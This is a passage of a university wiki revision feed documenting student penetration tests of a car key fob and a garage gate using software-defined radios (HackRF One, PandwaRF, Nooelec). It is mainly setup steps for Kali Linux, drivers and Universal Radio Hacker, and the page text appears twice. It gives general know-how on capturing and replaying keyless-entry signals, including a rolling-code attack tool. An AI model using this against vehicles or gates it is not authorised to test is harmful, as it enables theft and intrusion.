 &lt;br /&gt;
* Third method&lt;br /&gt;
#	git clone https://github.com/jopohl/urh&lt;br /&gt;
#   cd urh&lt;br /&gt;
#   python setup.py install&lt;br /&gt;
* Start Universal Radio Hacker with the command “urh”&lt;br /&gt;
** The device settings are listed below:&lt;br /&gt;
##	Choose HackRF&lt;br /&gt;
##	Enter the frequency&lt;br /&gt;
&lt;br /&gt;
=== Nesdr Smart – receive only ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Install the driver with zadig (detailed information in the HackRF One section)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Enter the RTL-SDR the “Device” option of the device settings and the frequency and you are ready to receive signals!&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
* HackRF One&lt;br /&gt;
* PandwaRF&lt;br /&gt;
* Nooelec SDR&lt;br /&gt;
&lt;br /&gt;
== Conclusion ==&lt;br /&gt;
We were able to receive signals with all three Software defined radios. However, HackRF One was the only device which allowed us to transmit signals too. It should be possible to transmit signal with PandwaRF as well, but we struggled with the Kaiju license, which is necessary for the transmission process. Therefore, we were able to achieve our project goals with the HackRF One.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.youtube.com/watch?v=5CsD8I396wo&amp;amp;t=327s&lt;br /&gt;
* https://www.essentracomponents.com/en-gb/news/product-resources/explaining-remote-keyless-entry-in-cars&lt;br /&gt;
* https://en.wikipedia.org/wiki/Rolling_code#:~:text=A%20rolling%20code%20(or%20sometimes,and%20keyless%20car%20entry%20systems&lt;br /&gt;
* https://www.youtube.com/watch?v=XrRGDQ2IzDE&lt;br /&gt;
* https://en.wikipedia.org/wiki/Remote_keyless_system&lt;br /&gt;
* https://sectigo.com/resource-library/why-automotive-key-fob-encryption-hacks-are-making-headlines&lt;br /&gt;
* https://rolling.pandwarf.com/&lt;br /&gt;
* https://www.offensive-wireless.com/how-to-install-universal-radio-hacker/&lt;br /&gt;
* https://installati.one/ubuntu/20.04/hackrf/&lt;br /&gt;
* https://zadig.akeo.ie/&lt;br /&gt;
* https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
* https://www.balena.io/etcher/&lt;br /&gt;
* https://www.kali.org/docs/introduction/download-official-kali-linux-images/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10278</id>
		<title>Software-defined radio (SDR): Relay Attacks</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10278"/>
		<updated>2022-07-12T18:39:42Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Pentesting with HackRF one */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
This documentation is about SDR (Software defined radio) and relay attacks. This document will give you a better understanding of these definitions and how some devices in IOT can/could be attacked with SDR relay attacks. This documentations will also provides detailed information about devices we used, the setup of these devices and other requirements. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
We used 3 different devices for the penetration-testing of a car and a gate. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Hardware &#039;&#039;&#039;&lt;br /&gt;
*HackRF-One&lt;br /&gt;
*PandwaRF&lt;br /&gt;
*Nooelec SDR (No transmission possible)&lt;br /&gt;
*Car&lt;br /&gt;
*Garage gate&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Software &#039;&#039;&#039;&lt;br /&gt;
*Computer with native Kali-Linux installed.&lt;br /&gt;
*License for PandwaRF.&lt;br /&gt;
*Universal Radio Hacker.&lt;br /&gt;
*PandwaRF App for Android. (Must be a device with latest Android version installed)&lt;br /&gt;
&lt;br /&gt;
In order to complete these steps, you must have followed [[Some Other Documentation]] before.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with PandwaRF ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Install the application on your Android Phone.&lt;br /&gt;
#Open the Device.&lt;br /&gt;
#Install the antennas. (Never use a SDR Device without antennas.)&lt;br /&gt;
#Connect the PandwaRF via USB-C to your phone.&lt;br /&gt;
#Open the application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#The device should have connected with your application. If not, do it manually in the search tab.&lt;br /&gt;
#After the device has connected, you can use the spectrum analyser to analyse the frequency which the device captures. If you want to get your desired signal, you need to choose your frequency. &lt;br /&gt;
#At the Rx/Tx tab you can scan you signal which you try to capture. It is even possible to auto detect a signal which is sent.The pandwaRF will give you the captured signal in hex or in Binary which you can afterwards analyze. &lt;br /&gt;
#In order to transmit a captured signal, you need to buy a &amp;quot;Kaiju License. Kaiju is an online tool where you can analyze rolling code and generate those. Kaiju is mainly used to attack systems which use rolling code.&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with HackRF one ===&lt;br /&gt;
&lt;br /&gt;
* Step 1&lt;br /&gt;
&lt;br /&gt;
#Set up a laptop with native kali linux &lt;br /&gt;
#If you want dual boot on your local machine use these instructions&lt;br /&gt;
&lt;br /&gt;
** Dualboot on windows machine &lt;br /&gt;
&lt;br /&gt;
#You need a USB stick with a minimum of 8gb storage&lt;br /&gt;
&lt;br /&gt;
#Download Kali image from official website&lt;br /&gt;
&lt;br /&gt;
#Download e.g. Etcher to flash the image on the USB stick to make it bootable&lt;br /&gt;
&lt;br /&gt;
#On the computer enter BIOS and change the BIOS-Mode to Legacy instead of Secure Boot (if secure boot is enabled). Secure boot prevents booting from external device! Then change the BIOS-Priority to “USB” first.&lt;br /&gt;
&lt;br /&gt;
#For further information follow the instructions on the official website &lt;br /&gt;
&lt;br /&gt;
* Step 2&lt;br /&gt;
** Driver Installation on HackRF One&lt;br /&gt;
#Download Zadig &lt;br /&gt;
#Only compatible with Windows &lt;br /&gt;
&lt;br /&gt;
* Set-up HackRF on Linux&lt;br /&gt;
#	Sudo apt-get update&lt;br /&gt;
#	Sudo apt-get -y install hackrf&lt;br /&gt;
&lt;br /&gt;
Download Universal Radio Hacker on Linux machine&lt;br /&gt;
* First method &lt;br /&gt;
#	Sudo python3 -m pip install –upgrade pip&lt;br /&gt;
#	Sudo python3 -m pip install urh&lt;br /&gt;
* Second method &lt;br /&gt;
#	Sudo apt -y install urh&lt;br /&gt;
 &lt;br /&gt;
* Third method&lt;br /&gt;
#	git clone https://github.com/jopohl/urh&lt;br /&gt;
#   cd urh&lt;br /&gt;
#   python setup.py install&lt;br /&gt;
* Start Universal Radio Hacker with the command “urh”&lt;br /&gt;
** The device settings are listed below:&lt;br /&gt;
##	Choose HackRF&lt;br /&gt;
##	Enter the frequency&lt;br /&gt;
&lt;br /&gt;
=== Nesdr Smart – receive only ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Install the driver with zadig (detailed information in the HackRF One section)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Enter the RTL-SDR the “Device” option of the device settings and the frequency and you are ready to receive signals!&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
* HackRF One&lt;br /&gt;
* PandwaRF&lt;br /&gt;
* Nooelec SDR&lt;br /&gt;
&lt;br /&gt;
== Conclusion ==&lt;br /&gt;
We were able to receive signals with all three Software defined radios. However, HackRF One was the only device which allowed us to transmit signals too. It should be possible to transmit signal with PandwaRF as well, but we struggled with the Kaiju license, which is necessary for the transmission process. Therefore, we were able to achieve our project goals with the HackRF One.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.youtube.com/watch?v=5CsD8I396wo&amp;amp;t=327s&lt;br /&gt;
* https://www.essentracomponents.com/en-gb/news/product-resources/explaining-remote-keyless-entry-in-cars&lt;br /&gt;
* https://en.wikipedia.org/wiki/Rolling_code#:~:text=A%20rolling%20code%20(or%20sometimes,and%20keyless%20car%20entry%20systems&lt;br /&gt;
* https://www.youtube.com/watch?v=XrRGDQ2IzDE&lt;br /&gt;
* https://en.wikipedia.org/wiki/Remote_keyless_system&lt;br /&gt;
* https://sectigo.com/resource-library/why-automotive-key-fob-encryption-hacks-are-making-headlines&lt;br /&gt;
* https://rolling.pandwarf.com/&lt;br /&gt;
* https://www.offensive-wireless.com/how-to-install-universal-radio-hacker/&lt;br /&gt;
* https://installati.one/ubuntu/20.04/hackrf/&lt;br /&gt;
* https://zadig.akeo.ie/&lt;br /&gt;
* https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
* https://www.balena.io/etcher/&lt;br /&gt;
* https://www.kali.org/docs/introduction/download-official-kali-linux-images/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
</feed>